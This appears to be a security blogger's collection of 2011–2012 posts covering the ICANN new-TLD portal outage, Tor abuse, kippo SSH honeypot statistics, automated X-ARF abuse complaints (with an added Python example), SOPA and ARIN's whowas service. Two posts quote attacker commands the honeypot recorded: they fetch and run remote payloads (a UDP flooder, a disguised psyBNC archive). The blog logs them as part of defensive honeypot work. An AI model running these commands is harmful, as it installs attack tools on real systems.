new TLDs: ICANN TAS portal down

April 12th, 2012

Just a few hours before the deadline for submitting new applications passed, the online portal
TAS used for submitting them broke down..

ICANN registration info

12 April 2012: Application window closes at 23:59 UTC on 12 April 2012

The database behind it is obviously not stress-tested, or poorly designed.
Funny that ICANN demands detailed technical expertise from applicants but fails
when data is actually submitted.

Quote from the ICANN page:
ICANN constantly monitors the performance of the TLD Application System (TAS). Recently, we received a report of unusual behavior with the operation of the TAS system. We then identified a technical issue with the TAS system software.

ICANN is taking the most conservative approach possible to protect all applicants and allow adequate time to resolve the issue. Therefore, TAS will be shut down until Tuesday at 23:59 UTC - unless otherwise notified before that time.

In order to ensure all applicants have sufficient time to complete their applications during the disruption, the application window will remain open until 23:59 UTC on Friday, 20 April 2012.

We apologize for any inconvenience this has caused. If you have any questions, please contact the gTLD Customer Service Center (CSC) via the CSC portal.

Tor exit node used for attack

March 21st, 2012

One recent reply to a kippo attack complaint explained that the attacking IP is a Tor exit node.

Of course there is no way for us to find the real attacker when he/she is using Tor
for making this attack. Sad that this important service is abused in this way.

The system you have identified (cs-tor.bu.edu / 204.8.156.142) is an exit node on the Tor network. Tor is a distributed cryptographic anonymizing proxy service. The network traffic you detected was merely relayed through this system, and did not originate there. It is not possible to trace these connections back to their original source.

sshd complaints – update

March 14th, 2012

The automatic complaint mechanism is now active. An X-ARF complaint is generated
for each session where a successful login into the kippo honeypot produced some
recorded commands. The email address the complaint is sent to is generated
as always – check our own database, check the RIPE website and check abusix.
Here is an example of the second MIME part:

MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="utf8"; name="report.yaml"
Reported-From: spamtrap@netcologne.de
Category: abuse
Report-Type: login-attack
Destination-System: kippo – sshd honeypot
User-Agent: PHREAK 1.3
Report-ID: 2faf4f486d7f11e18949797f346be17f@netcologne.de
Date: 2012-03-14 03:45:28
Service: sshd
Port: 22
Source: 89.129.**.** (obfuscated)
Source-Type: ipv4
Attachment: text/plain
Schema-URL: http://www.x-arf.org/schema/abuse_login-attack_0.1.2.json
Version: 1.0.1

and the third MIME part looks like this:

MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="utf8"; name="command.txt"

recorded commands during this session:

w
uname -a
wget http://root-arhive.at.ua/flood/udp.tgz
tar zxvf udp.tgz
rm -rf udp.tgz
chmod +x *
--===============0648269240==--

sshd-complaints

March 9th, 2012

I am pretty close to starting to send out complaints
for successful sshd logins on my kippo honeypot.
The X-ARF part is ready. I decided to add the recorded
commands in the 3rd MIME part. The ttylog could also
be useful, but the receiver of the complaint is probably
not so interested in starting the playlog utility for
each complaint.
I still need to implement a database check so that receivers
only get a handful of complaints and are not overwhelmed by the
number of complaints..
Additionally the caught IPs will be added to our blacklist,
just like those from the attacks caught by nepenthes.
Dionaea attacks will come next 🙂
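The X-ARF complaint shown in the update above and the per-receiver throttle planned in this post, as an added Python example (not the blog's own code): it assembles the three MIME parts from one recorded kippo session using the field names from the report above; the reporter address, the User-Agent string, the throttle limits and the sample session are constructed assumptions.

```python
# Added example (not the blog's own code): build the three-part X-ARF
# complaint shown in the post from one recorded kippo session, and apply
# the per-receiver throttle the author plans. Field names follow the post;
# reporter address, User-Agent, throttle limits and sample data are constructed.
from datetime import datetime, timedelta
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import uuid

SCHEMA_URL = "http://www.x-arf.org/schema/abuse_login-attack_0.1.2.json"

def build_xarf(source_ip, when, commands, reporter="abuse@example.invalid"):
    """Return a multipart/mixed message: human text, report.yaml, command.txt."""
    msg = MIMEMultipart("mixed")
    msg["From"] = reporter
    msg["Subject"] = "abuse report about %s - %s" % (source_ip, when.date())
    msg.attach(MIMEText("Successful login followed by commands on our sshd honeypot.\n"))
    # Second part: the machine-readable X-ARF report, one "Key: value" per line.
    fields = [
        ("Reported-From", reporter), ("Category", "abuse"),
        ("Report-Type", "login-attack"), ("Destination-System", "kippo - sshd honeypot"),
        ("User-Agent", "example-reporter 0.1"),  # constructed name
        ("Report-ID", "%s@%s" % (uuid.uuid4().hex, reporter.split("@")[1])),
        ("Date", when.strftime("%Y-%m-%d %H:%M:%S")), ("Service", "sshd"), ("Port", 22),
        ("Source", source_ip), ("Source-Type", "ipv4"), ("Attachment", "text/plain"),
        ("Schema-URL", SCHEMA_URL), ("Version", "1.0.1"),
    ]
    report = MIMEText("".join("%s: %s\n" % kv for kv in fields))
    report.set_param("name", "report.yaml")
    msg.attach(report)
    # Third part: the commands kippo recorded during the session.
    cmds = MIMEText("recorded commands during this session:\n\n" + "\n".join(commands) + "\n")
    cmds.set_param("name", "command.txt")
    msg.attach(cmds)
    return msg

def should_send(receiver, sent_log, now, limit=5, window=timedelta(days=1)):
    """Throttle: True only if fewer than `limit` complaints went to `receiver`
    within `window` (the 'handful' the author wants to stay below)."""
    recent = [t for r, t in sent_log if r == receiver and now - t < window]
    return len(recent) < limit

if __name__ == "__main__":
    # Constructed sample session; 203.0.113.0/24 is documentation address space.
    now = datetime(2012, 3, 14, 3, 45, 28)
    m = build_xarf("203.0.113.45", now, ["w", "uname -a", "cat /proc/cpuinfo"])
    print(m.as_string())
    log = [("abuse@example.invalid", now - timedelta(hours=h)) for h in range(5)]
    print(should_send("abuse@example.invalid", log, now))  # False: limit reached
```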

projecthoneypot.org

January 26th, 2012

Today I received a notification from projecthoneypot.org
that one of my donated spamtrap-domains helped to catch a new
harvester. Feels good to be able to help 🙂

kippo-graph

December 28th, 2011

After trying to build some nice graphs for the kippo honeypot with PyCha I found
this little toolbox, which does things much better than I did:

kippo-graph Homepage (link fixed)

Here are the first results from my honeypot (no live DB queries are made, so inputs
are not visible right now): Kippo-Stats

kippo stats

December 14th, 2011

The kippo honeypot has now been running for about a week..

Up to now I have seen

* more than 1.3 million connects

* more than 7,100 successful logins

* more than 2,200 commands typed

* more than 2,100 different source IP addresses

* 178 files uploaded, most of them psyBNC bouncers

Wow.. I expected *some* brute-force attempts, but that many?

successful ssh brute-force found by kippo

December 7th, 2011

The sshd honeypot named kippo is a fun tool to play with. After installing it I found
more than 1000 successful logins in about 12 hours! Most logins do nothing
after succeeding, but some download files and try to do “things”:

-rw------- 1 kippo kippo 81211778 Dec 6 23:20 20111206231910_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw------- 1 kippo kippo 34603008 Dec 7 01:19 20111207011938_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw------- 1 kippo kippo 53477376 Dec 7 01:21 20111207012055_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw------- 1 kippo kippo 3513408 Dec 7 01:21 20111207012120_http___www_steampowered_com_download_hldsupdatetool_bin
-rw------- 1 kippo kippo 608074 Dec 7 08:46 20111207084559_http___4u_moy_su_bnc_jpg

coming from commands like:

CMD: wget http://4u.moy.su/bnc.jpg;tar zxvf bnc.jpg;rm -rf bnc.jpg;cd .log;./go

I will try to build some public stats later..

SOPA

December 6th, 2011

A Twitter message:

“Under SOPA, you could get 5 years for uploading a Michael Jackson
song, one year more than the doctor who killed him.”

For those who don’t know what SOPA means:

http://en.wikipedia.org/wiki/Stop_Online_Piracy_Act

whowas Service

November 28th, 2011

An email from MAAWG informed me about a new service showing up at ARIN:

There is a new “whowas” service showing historical data for an IP or ASN.
It will be publicly available in a trial version at: https://www.arin.net/resources/whowas/.

One goal of the trial is to gather data about use cases and how
often the service would be used, to determine whether to work on that goal.

So let’s see if this service can be helpful to us.